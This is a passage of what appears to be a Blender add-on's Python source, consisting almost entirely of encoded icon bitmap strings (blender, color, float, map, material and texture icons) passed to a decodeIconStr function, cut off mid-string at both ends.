/gAA///A///A///A/gAA/gAZ/gAu/gA7/gA//gA//gA//gA//gA//gA//gA//gAd/gAA/gAZ/gAu/gA//gA//gA//gA//gA//gA//gA3/gAm/gAI/gAE/gAz/gA//gA//gAZ/gAA/gAA/gAA/gAZ/gA//gA//gAm/gAR/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAz/gAd/gAE/gAA/gA//gA//gAd/gAA/gAI/gAm/gA3/gA//gA//gA//gAR/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA//gAA/gAE/gAd/gAz/gA//gA//gA//gA//gA//gA7/gAq/gAV/gAA///A///A///A///A///A///A/gAA/gAA/gAA/gAI/gAK/gAA/gAA/gAA/gAA/gAn/gA//gA//gAc/gAA/gAA/gAA/gAA///A///A///A/gAi/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAd/gAZ/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA7/gAE/gAE/gAz/gA//gA//gAR/gAA/gAZ/gA//gA//gAm/gAA/gAR/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAz/gAA/gA//gA//gAd/gAI/gA7/gA//gA//gA//gA//gA//gAR/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA//gAA/gAu/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAi///A///A///A///A///A///A/gAA/gAA/gAA/gAv/gA4/gAA/gAA/gAA/gAD/gA9/gA//gA//gAz/gAA/gAA/gAA/gAA///A///A///A/gA//gA//gAq/gAI/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAu/gA//gA3/gAI/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA//gAR/gAA/gAM/gA7/gA//gA7/gAZ/gA//gA//gAz/gAA/gAA/gAR/gA//gA//gAR/gAA/gAA/gAA/gAA/gAA/gAA/gAE/gAd/gA//gA//gAM/gA//gA//gAd/gAd/gA//gA//gAd/gAI/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA//gAA/gA//gA//gAq/gAA/gAA/gAA/gAA/gAA/gAE/gAq/gA//gA////A///A///A///A///A///A/gAA/gAA/gAA/gAN/gAQ/gAA/gAA/gAA/gAA/gAs/gA//gA//gA+/gAs/gAp/gAZ/gAA///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gAR/gAA/gAA/gAM/gA7/gA//gA//gA//gAz/gAE/gAA/gAA/gAR/gA//gA//gAR/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gAR/gA//gA//gAd/gAd/gA//gA//gAu/gAu/gAu/gAu/gAu/gAu/gAu/gAu/gAu/gAM/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA//gAA/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA////A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAI/gAA/gAE/gAZ/gAw/gA//gA//gA//gA//gAh///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gAR/gAA/gAA/gAA/gAR/gA//gA//gA//gAI/gAA/gAA/gAA/gAR/gA//gA//gAm/gAd/gAd/gAd/gAd/gAd/gAd/gAd/gA3/gA//gA3/gAA/gA//gA//gAd/gAd/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAR/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA//gAA/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA////A///A///A///A///A///A/gAl/gAL/gAA/gAA/gAA/gAA/gAf/gA+/gAd/gAA/gAA/gAT/gA//gA//gA//gA//gA6///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gAR/gAA/gAA/gAE/gAz/gA//gA//gA//gAz/gAE/gAA/gAA/gAR/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAd/gAA/gA//gA//gAd/gAd/gA//gA//gAR/gAR/gAR/gAR/gAR/gAR/gAd/gA//gA//gAR/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA//gAA/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA////A///A///A///A///A///A/gAl/gAK/gAA/gAA/gAA/gAA/gAf/gA+/gAd/gAA/gAA/gAT/gA//gA//gA//gA//gA6///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gAR/gAA/gAA/gAz/gA//gA7/gAd/gA//gA//gAm/gAA/gAA/gAR/gA//gA//gAm/gAd/gAd/gAd/gAd/gAd/gAd/gAd/gAu/gA//gA//gAI/gA//gA//gAd/gAd/gA//gA//gAd/gAR/gAR/gAR/gAR/gAR/gAq/gA//gA//gAR/gAu/gA//gA7/gAZ/gAR/gAR/gAR/gAR/gAV/gAz/gA//gA//gAA/gA3/gA//gA7/gAi/gAd/gAd/gAd/gAd/gAd/gAu/gA//gA////A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAI/gAA/gAE/gAa/gAw/gA//gA//gA//gA//gAg///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAu/gA//gAu/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gAR/gAA/gAm/gA//gA7/gAM/gAA/gAZ/gA//gA//gAm/gAA/gAR/gA//gA//gAR/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gAR/gA//gA//gAd/gAE/gAz/gA//gA//gA//gA//gA//gA//gA//gA//gA//gAz/gAA/gAV/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAi/gAA/gAV/gA7/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA////A///A///A///A///A///A/gAA/gAA/gAA/gAO/gAR/gAA/gAA/gAA/gAA/gAt/gA//gA//gA+/gAs/gAq/gAZ/gAA///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAi/gAu/gAi/gAA/gAA/gAA/gAA/gAA/gAA/gAM/gAu/gAu/gAM/gAm/gA//gA7/gAM/gAA/gAA/gAA/gAm/gA//gA//gAd/gAR/gA//gA//gAd/gAR/gAR/gAR/gAR/gAR/gAR/gAR/gAq/gA//gA//gAM/gA//gA//gAd/gAA/gAA/gAZ/gAm/gAu/gAu/gAu/gAu/gAu/gAq/gAZ/gAA/gAA/gAA/gAI/gAd/gAu/gAu/gAu/gAu/gAu/gAu/gAi/gAV/gAA/gAA/gAA/gAE/gAV/gAd/gAd/gAd/gAd/gAd/gAd/gAu/gA//gA////A///A///A///A///A///A/gAA/gAA/gAA/gAv/gA4/gAA/gAA/gAA/gAD/gA9/gA//gA//gAz/gAA/gAA/gAA/gAA///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAR/gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gA//gAm/gAA/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA////A///A///A///A///A///A/gAA/gAA/gAA/gAI/gAK/gAA/gAA/gAA/gAA/gAn/gA//gA//gAc/gAA/gAA/gAA/gAA///A///A///A/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAM/gAu/gAu/gAu/gAu/gAu/gAu/gAu/gAu/gAu/gAu/gAm/gAR/gAA/gAA/gA//gA//gAd/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAd/gA//gA////A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAC/gAO/gAC/gAB/gAS/gAP/gAA/gAA/gAA/gAA/gAA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAj/gA//gAh/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAa/gA5/gAY/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_blender = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wA27wA27wA27wAFFFGIIIsNNN5IIIsFFFG27wA27wA27wA27wA27wA///A27wA27wA27wA27wA27wAFFFmnnn9sss/kkk9FFFm27wA27wA27wA27wA27wA///A27wA27wA27wA27wA27wAEEEvwww/AAA/sss/EEEv27wA27wA27wA27wA27wA///A27wA27wA27wA27wA27wAFFFxzzz/xxx/vvv/FFFx27wA27wA27wA27wA27wA///A27wAGGGRLLLtKKK7KKK9JJJ/111/ppp/xxx/III/JJJ9JJJ7LLLtGGGR27wA///AGGGQPPP8xxx/444/vvv/555/333/999/zzz/xxx/jjj/nnn/nnn/OOO8GGGQ///ALLL2222/zzz/lll/+++/888/666/444/222/000/yyy/aaa/nnn/vvv/LLL2///AMMMxqqq/+++/ttt/////AAA/888/666/444/AAA/000/iii/zzz/nnn/MMMx///AGGGKLLLqKKK7ZZZ/yyy/yyy/yyy/888/vvv/ttt/rrr/VVV/JJJ7LLLqGGGK///A27wA27wA27wAJJJ1999+////sss5UUU8qqq5777/333+III127wA27wA27wA///A27wA27wA27wAHHHJMMMzUUU7GGGpHHHIGGGpSSS7MMMzHHHJ27wA27wA27wA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_col = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wA27wA27wAVIAPXKB5VIAS27wA27wA27wA27wA///A///A///A///A///A27wA27wA27wAVIAPXKB8shU/XLC9VIAS27wA27wA27wA///A///A///A///A///A27wA27wAVIAPXKB8ymU/7xd/0qb/XLC9VIAS27wA27wA///A///A///A///A///A27wAVIAPXKA8xkO/7uW/7wa/7xd/0qb/XLC9VIAS27wA///A///A///A///A///AVIAPXKA8xiJ/6rO/6sS/7uW/7wZ/7xd/0qa/XLC9VIAS///A///A///A///A///AXKA1ypd/+6z/6rO/6rO/6sS/7uW/7vZ/7xd/shT/XKB5///A///A///A///A///AVJAMYMC873w/+6z/6rO/6rO/6sS/7uV/ymT/XKB8VIAP///A///A///A///A///A27wAVJAMYMC873w/+6z/6rO/6rO/xkN/XKB8VIAP27wA///A///A///A///A///A27wA27wAVJAMYMC873w/+6z/xiJ/XKA8VIAP27wA27wA///A///A///A///A///A27wA27wA27wAVJAMYMC8xpc/XKA8VIAP27wA27wA27wA///A///A///A///A///A27wA27wA27wA27wAVJAMXKA1VIAP27wA27wA27wA27wA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_float = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wA27wA27wAMMMSOOO5MMMP27wA27wA27wA27wA///A///A///A///A///A27wA27wA27wAMMMSPPP9nnn/PPP8MMMP27wA27wA27wA///A///A///A///A///A27wA27wAMMMSPPP9ttt/333/vvv/PPP8MMMP27wA27wA///A///A///A///A///A27wAMMMSOOO9ppp/zzz/111/333/vvv/PPP8MMMP27wA///A///A///A///A///AMMMSOOO9lll/uuu/www/zzz/111/333/vvv/PPP8MMMP///A///A///A///A///AOOO5sss/666/sss/uuu/www/zzz/111/333/kkk/PPP1///A///A///A///A///AMMMPQQQ8444/666/ttt/uuu/www/zzz/ppp/OOO8MMMM///A///A///A///A///A27wAMMMPQQQ8444/666/ttt/uuu/mmm/OOO8MMMM27wA///A///A///A///A///A27wA27wAMMMPQQQ8444/555/jjj/OOO8MMMM27wA27wA///A///A///A///A///A27wA27wA27wAMMMPQQQ8ppp/OOO8MMMM27wA27wA27wA///A///A///A///A///A27wA27wA27wA27wAMMMPOOO1MMMM27wA27wA27wA27wA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_map2d = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wA27wA27wA27wAMMMUMMMzMMMzMMMU27wA27wA27wA27wA27wA///A///A27wA27wA27wANNNPMMMyYVQ/wnV/bbb/RRR/MMMyNNNP27wA27wA27wA///A///A27wAMMMLMMMtWUQ/vnZ/7vY/6rP/aaa/eee/ZZZ/PPP/MMMtMMML27wA///A///AMMMfTSQ/tnc/7yg/7uV/6qN/6qM/YYY/ZZZ/ddd/fff/YYY/OOO/MMMf///A///AMMM/71o/7wb/6sQ/rgK/dVG/6qM/YYY/ZZZ/bbb/ccc/fff/ggg/MMM////A///AMMM/92q/AAA/6rP/dVH/AAA/6qM/YYY/ZZZ/bbb/ccc/eee/iii/MMM////A///AMMM/93r/dWI/6rP/dVH/AAA/6qM/XXX/ZZZ/bbb/ccc/eee/iii/MMM////A///AMMM/94t/6sR/6rQ/6rO/6qN/6qM/XXX/ZZZ/bbb/ccc/eee/jjj/MMM////A///AMMM/94u/dWI/dVI/6rP/6rN/6qM/XXX/ZZZ/bbb/ccc/eee/kkk/MMM////A///AMMM/+5v/AAA/AAA/6rP/7vX/94t/xxx/ggg/bbb/ccc/eee/lll/MMM////A///AMMM/+5x/6sR/7xd/+6y/////////////////111/mmm/eee/mmm/MMM////A///AMMM/+72//96/////////////////////////////////666/vvv/MMM////A///AMMMiTTS/wuq/986/////////////////////////555/ppp/SSS/MMMi///A///A27wAMMMHMMMdMMM0aZX/0yu/+97/888/uuu/XXX/MMM0MMMdMMMH27wA///A///A27wA27wA27wA27wANNNLMMMhMMM3MMM3MMMhNNNL27wA27wA27wA27wA///A")
icon_map2dparam = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wAQQQB27wA27wA27wA27wA27wA27wA27wA27wA27wA27wA27wA27wA///A///A27wAUUUwMMM9EEE3AAAvAAAlAAAbAAAI27wA27wA27wA27wA27wA27wA///A///A27wAeeeOVVV9OOO/MMM/CCC/AAA+AAA9AAAg27wA27wA27wA27wA27wA///A///A27wA27wAfffKWWW9ggg/mmm/TTT/AAA/AAA9AAAS27wA27wA27wA27wA///A///A27wA27wA27wAeeeXVVV9hhh/lll/TTT/BBB/BBB6AAAN27wA27wA27wA///A///A27wAAAAK27wA27wAdddgTTT8NNN/NNN/JJJ/VVV9EEE8AAAoAAAG27wA///A///A27wAAAAXAAAA27wA27wAeeeaVVV2QQQ/nnn+222/mmm/PPP9JGF8KGCX///A///A27wAAAAkAAAA27wA27wA27wA27wAVVVXYYY8+++/333/gec+ZPL+XOJq///A///A27wAAAAxAAAB27wA27wA27wA27wA27wAXXXiiii83219ofY8eUO/aQL2///A///A27wAAAA9AAAC27wA27wA27wA27wA27wAgggAWWVwmgc84yt/oeW/gWP1///A///ACCC6AAA/AAA/CCC627wA27wA27wA27wA27wAKFFDKGDzxsm52wq/peW2///A///AAAA/////////AAA/AAABAAAAAAAAAAAA27wA27wALFCFMHE31wr61uo5///A///AAAA/////////AAA/AAA+AAAzAAAmAAAZAAAM27wA27wAKFDJPLH6umez///A///ACCC6AAA/AAA/CCC627wA27wA27wA27wA27wA27wA27wA27wAKFCOOJFf///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_map3dparam = decodeIconStr("27wA27wA27wA27wA27wA27wA3nIC6pMJ6pMJ3nIC27wA27wA27wA27wA27wA27wA27wA27wA27wA27wA27wA3nIC6qMj6qM/6qM/6qMj3nIC27wA27wA27wA27wA27wA27wA27wA27wA27wA27wA6pMJ6qM/////////6qM/6pMJ27wA27wA27wA27wA27wA27wA27wA27wA27wANNNOSQMz5qM/////////5qM/SQMzNNNO27wA27wA27wA27wA27wA27wAMMMIMMMrXXX/www/5wg/6qM/5qM/vnX/bbb/PPP/MMMrMMMI27wA27wA27wA27wAMMM1xxx/777/222/yyy/zxu/caY/bbb/ggg/iii/YYY/MMM127wA27wA27wA27wAMMM/+++/zzz/yyy/yyy/yyy/ZZZ/bbb/ddd/fff/kkk/MMM/27wA27wA27wA27wAMMM/////yyy/yyy/yyy/yyy/ZZZ/bbb/ddd/eee/lll/MMM/27wA27wA27wA27wAMMM/////yyy/yyy/yyy/yyy/ZZZ/bbb/ddd/eee/nnn/MMM/27wA27wA27wA3nICRPM//97/yyy/yyy/yyy/yyy/ZZZ/bbb/ddd/eee/rpm/RPM/3nIC27wA3nIC6qMj5qM/6qM/2ue/zzz/444/999/666/rrr/fff/tkU/5qM/5qM/6qMj3nIC6pMJ6qM/////////6qM/+96/////////////////985/6qM/////////6qM/6pMJ6pMJ6qM/////////6qM/+86/////////////////974/6qM/////////6qM/6pMJ3nIC6qMj6qM/6qM/pfM2PPP+mmm/555/000/hhh/PPP+pfM26qM/6qM/6qMj3nIC27wA3nIC6pMJ6pMJ3nICMMMEMMMaMMMwMMMwMMMaMMME3nIC6pMJ6pMJ3nIC27wA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_mat = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A27wA27wA27wAVJAMXKBnXLB1WJA9XLB1XKBnVJAM27wA27wA27wA///A///A///A27wAVAAAWJBgYMD9ukW/1sc/5we/0qY/sgQ/XLB9WJBgVAAA27wA///A///A///A27wAWJBghXM96zk/8yf/7wa/7vY/7vZ/YUN/TQM/aPF9WJBg27wA///A///A///AVIALZNE970o/7wb/QNG/QNG/7vX/7vX/JHD/DDD/bXP/XKB9VIAL///A///A///AXKBpype/8zj/7vX/QNG/QNG/7vX/7vX/sjR/IGD/keS/rfQ/XKBp///A///A///AXLB36zp/7xc/7vX/7vX/7vX/7vX/7vX/7vX/7vX/7vZ/0qZ/XLB3///A///A///AVJA+95x/2rX/fYM/zoU/7vX/7vX/7vX/7vX/7vX/7vY/6wf/VJA+///A///A///AXKB361s/VTO/AAA/NKF/7vX/7vX/meP/IGD/JHD/tkU/1rc/XKB3///A///A///AXKBq0tj/cba/AAA/HGD/7vX/7vX/IGD/AAA/AAA/VTQ/ujW/XKBq///A///A///AVIAMaPG920w/RPN/meP/7vX/7vX/gaM/BAA/HHH/njd/YMD9VIAM///A///A///A27wAWKBilbS995y/91n/8xd/7vZ/7xc/4wh/4yn/iXM9WKBi27wA///A///A///A27wAQQABWKBiaOF9zsj/61s/95x/5zp/xpe/ZNE9WKBiQQAB27wA///A///A///A27wA27wA27wAVIAMXKBqXKB3VJA+XKB3XKBqVIAM27wA27wA27wA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_matmix = decodeIconStr("27wA27wA27wA27wA27wA27wA27wAMIFdUMG7WNF+WNF+SLG5LHFS27wA27wA///A27wA27wA27wA27wA27wASLGAOJGziYN/xmV/wmT/pgQ/jaN/YPH/NJGm27wA///A27wA27wA27wA27wA27wAMIFjlbR/9ye/6sQ/zlJ/sgJ/ofM/ngT/YPH/MIGT///A27wA27wA27wA27wA27wAXQJ/6xk/9xZ/6sQ/5qM/zlK/sfI/ofM/jaN/SLG5///A27wA27wA27wA27wAHHHGgXQ//4r/8xc/7vX/7tR/5pM/zlK/sgJ/pgQ/WMF+///A27wA27wA27wA27wAJOVVYbf/58//y27/wz3/7vY/7tS/4pM/ykJ/vmU/WMF////A27wAAAAALIGkTMG+NQU/Qcu/Sfz/Sfz/Wi1/wz4/7vZ/7sR/6sR/wmW/UMH8///ASLGAOJG1iYN/xmV/kns/Rfz/99+/++//Rfz/z27/8ye/9yc/9zg/iYN/LIFh///AMHFilbR/9ye/6sQ/jns/Rfz/////////Rfz/57///4q/6xk/lbR/NJG227wA///AYQJ96xk/9xZ/6sQ/orw/Tgz/Rfz/Rez/Qdw/Xaf/gXP/XPI/MIGoAAAA27wA///AgXQ//4r/8xc/7vX/7tR/nrw/jms/dhn/ein/WNG/GGGRAAAA27wA27wA27wA///AhYR//7x/91m/8xe/7vY/7tS/4pM/ykJ/vmU/WMF/GGGH27wA27wA27wA27wA///AbTM995x//+6/80k/8ye/7vZ/7sR/6sR/wmW/TMG+27wA27wA27wA27wA27wA///APIEitld///7//+6/91n/8ye/9yc/9zg/iYN/LIGk27wA27wA27wA27wA27wA///ARKGCRKFyskc/94v//7w//4q/6xk/lbR/OJG0AAAA27wA27wA27wA27wA27wA///A27wAQJECPIEibTL9hYQ/gXP/YQJ9MHEi27wA27wA27wA27wA27wA27wA27wA///A")
icon_tex = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///AOOO6MMM/MMM/MMM/MMM/MMM/MMM/MMM/MMM/MMM/MMM/MMM/OOO6///A///A///AMMM/444/555/555/555/555/666/666/777/777/888/888/MMM////A///A///AMMM/555/mmm/TTT/aaa/xxx/111/222/222/QQQ/ZZZ/777/MMM////A///A///AMMM/333/DDD/AAA/AAA/YYY/zzz/111/xxx/AAA/AAA/nnn/MMM////A///A///AMMM/222/DDD/AAA/AAA/bbb/yyy/zzz/111/RRR/AAA/iii/MMM////A///A///AMMM/666/jjj/TTT/ddd/vvv/xxx/yyy/zzz/000/rrr/555/MMM////A///A///AMMM/666/rrr/sss/uuu/vvv/www/xxx/yyy/zzz/000/666/MMM////A///A///AMMM/666/qqq/iii/qqq/uuu/vvv/ppp/nnn/yyy/zzz/555/MMM////A///A///AMMM/777/jjj/AAA/RRR/sss/bbb/AAA/AAA/SSS/yyy/555/MMM////A///A///AMMM/888/mmm/LLL/ccc/rrr/QQQ/AAA/AAA/AAA/www/555/MMM////A///A///AMMM/888/nnn/ooo/ppp/qqq/jjj/HHH/DDD/XXX/www/555/MMM////A///A///AMMM/666/888/888/777/666/666/555/555/555/444/333/MMM////A///A///ANNN4NNN+NNN+NNN+NNN+NNN+NNN+NNN+NNN+NNN+NNN+NNN+OOO4///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_texcol = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///AWKA4VJA+VJA+VJA+VJA+VJA+VJA+VJA+VJA+VJA+VJA+VJA+WKA4///A///A///AVIA/82p/93r/93r/93s/93s/93s/93t/94u/94u/94w/95w/VIA////A///A///AVIA/93s/xoV/ZVM/icR/6wf/8zi/80k/80l/USN/daU/94v/VIA////A///A///AVIA/72r/FDC/AAA/AAA/eZP/8yf/8zh/3vg/AAA/AAA/olf/VIA////A///A///AVIA/50p/DCB/AAA/AAA/faO/8xd/8yf/8zh/SPK/AAA/jga/VIA////A///A///AVIA/94t/rhO/WRI/haN/5uY/7wb/8xd/8yf/7yg/tma/72r/VIA////A///A///AVIA/94u/6sQ/6tT/7uV/7uX/7vY/7wa/7xc/8ye/8yg/93s/VIA////A///A///AVIA/94u/6rO/ylO/5sS/7uU/7uW/1qV/yoW/7xc/8ye/93s/VIA////A///A///AVIA/+5w/zlL/DDD/bVK/6tS/mdN/AAA/AAA/YTK/7xc/93r/VIA////A///A///AVIA/+5x/3oL/NKD/mcK/6sQ/WQG/AAA/AAA/BAA/5uZ/93r/VIA////A///A///AVIA/+6z/6qM/6qM/6qM/6rO/ujM/IGC/BBA/aUJ/7vX/93r/VIA////A///A///AVIA/+5w/+6y/+5w/+4v/94t/93s/82r/93r/93r/93r/92p/VIA////A///A///AWJA6VJA/WJB/WJB/WJB/WJB/WJB/WJB/WJB/WJB/WJB/VJA/WJA6///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_texmix = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///APPP7ccc/ddd/ccc/bbb/bbb/ddd/eee/RRR9///A///A///A///A///A///A///AYYY+yyy/fff/qqq/000/111/jjj/sss/eee////A///A///A///A///A///A///Aaaa9XXX/AAA/III/rrr/xxx/LLL/GGG/VVV////A///A///A///A///A///A///AZZZ9hhh/JJJ/XXX/rrr/uuu/kkk/eee/YYY////A///A///A///A///A///A///AVYd/sv0/imq/nqu/rrr/ttt/vvv/000/bbb////A///APPP7ccc/ddd/ccc/Ycg/Qcu/Sfz/Sfz/Wi1/fin/RRR/bbb/yyy/bbb////A///AYYY+yyy/fff/qqq/x05/Rfz/99+/++//Rfz/PSX/AAA/AAA/uuu/bbb////A///Aaaa9XXX/AAA/III/orw/Rfz/////////Rfz/lpu/XXX/eee/000/ccc////A///AZZZ9hhh/JJJ/XXX/osw/Tgz/Rfz/Rez/Qdw/Wae/bbb9aaa9YYY9PPP7///A///AYYY9vvv/lll/ppp/rrr/pty/sw1/w06/Ych////A///A///A///A///A///A///AZZZ9sss/SSS/iii/hhh/RRR/bbb/yyy/bbb////A///A///A///A///A///A///AZZZ9rrr/JJJ/eee/SSS/AAA/AAA/uuu/bbb////A///A///A///A///A///A///AZZZ+111/ttt/uuu/ooo/XXX/eee/000/ccc////A///A///A///A///A///A///AOOO4aaa9aaa9ZZZ9ZZZ9bbb9aaa9YYY9PPP7///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_texmixcol = decodeIconStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///AaOE7mcS/ndT/mcS/lbS/kbS/ndU/neV/bQH9///A///A///A///A///A///A///AiYP+92o/niY/0tg//4p//6s/pme/wun/neV////A///A///A///A///A///A///AkZP9aYT/AAA/LJF/5vd//2j/OMH/GHH/eVN////A///A///A///A///A///A///AjYP9qlZ/OKE/haO/7wb/+zf/voZ/jgY/hYP////A///A///A///A///A///A///AXae/z27/qty/ux2/9wZ/+yc//1f//5o/lbS////A///AaOE7mcS/ndT/mcS/adh/Qcu/Sfz/Sfz/Wi1/lot/ZUK/leQ//3l/kbR////A///AiYP+92o/niY/0tg/25+/Rfz/99+/++//Rfz/TXc/AAA/BAA/9zg/lbS////A///AkZP9aYT/AAA/LJF/tx2/Rfz/////////Rfz/quz/bZU/lhX//6o/lcS////A///AjYP9qlZ/OKE/haO/uy3/Tgz/Rfz/Rez/Qdw/Ybg/laQ9laQ9iYP9aOE7///A///AhXP9/1f/6sQ/8vW